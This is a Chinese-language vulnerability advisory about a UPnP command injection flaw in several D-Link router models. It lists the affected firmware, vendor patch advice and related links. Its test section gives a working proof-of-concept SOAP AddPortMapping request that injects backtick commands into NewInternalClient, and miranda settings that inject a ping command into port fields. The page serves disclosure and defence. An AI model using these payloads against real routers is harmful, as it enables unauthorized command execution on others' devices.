发布日期:2013-07-07
更新日期:2013-07-11受影响系统:
D-Link DIR-300
D-Link DIR-600 2.12b02
D-Link DIR-645
D-Link DIR-865L 1.05b03
D-Link DIR-845 1.01b02
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61005D-Link是国际著名网络设备和解决方案提供商,产品包括多种路由器设备。多个 D-Link 产品存在命令注入漏洞,利用这些漏洞攻击者可以在受影响设备上下文中执行任意命令。受影响设备包括:DIR-300 rev B running firmware 2.14b01
DIR-600 running firmware 2.16b01
DIR-645 running firmware 1.04b01
DIR-845 running firmware 1.01b02
DIR-865 running firmware 1.05b03<*来源:m-1-k-3
链接:http://xforce.iss.net/xforce/xfdb/85461
http://packetstormsecurity.com/files/122307/D-Link-UPnP-OS-Command-Injection.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!=> Parameter: NewInternalClient, NewInternalClient, NewInternalPortExample Request:
POST /soap.cgi?service=WANIPConn1 HTTP/1.1
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
Host: 10.8.28.133:49152
Content-Type: text/xml
Content-Length: 649<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewPortMappingDescription></NewPortMappingDescription>
<NewLeaseDuration></NewLeaseDuration>
<NewInternalClient>`COMMAND`</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewExternalPort>634</NewExternalPort>
<NewRemoteHost></NewRemoteHost>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>45</NewInternalPort>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
You could use miranda for your own testing:* NewInternalClient
Required argument:
Argument Name: NewInternalClient
Data Type: string
Allowed Values: []
Set NewInternalClient value to: `ping 192.168.0.100`* NewExternalPort
Required argument:
Argument Name: NewExternalPort
Data Type: ui2
Allowed Values: []
Set NewExternalPort value to: `ping 192.168.0.100`* NewInternalPort
Required argument:
Argument Name: NewInternalPort
Data Type: ui2
Allowed Values: []
Set NewInternalPort value to: `ping 192.168.0.100`Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/dir-865-v105-shell.png建议:
--------------------------------------------------------------------------------
厂商补丁:D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.dlink.com/Adobe Shockwave Player内存破坏漏洞(CVE-2013-3348)IE8 用户要当心了 新漏洞已经被利用相关资讯 D-Link D-Link安全漏洞
- 多个D-Link产品UPnP缓冲区溢出漏洞 (07/29/2015 13:27:45)
- D-Link DIR-601身份验证绕过漏洞 (05/05/2015 14:10:55)
- 多个D-Link产品HNAP命令远程权限提 (04/22/2015 16:56:15)
| - 多个D-Link产品HTTP缓冲区溢出漏洞 (07/29/2015 13:27:16)
- D-Link和趋势网络路由器发现远程执 (04/30/2015 07:44:07)
- D-Link DIR-645命令注入及栈缓冲区 (03/04/2015 06:55:27)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站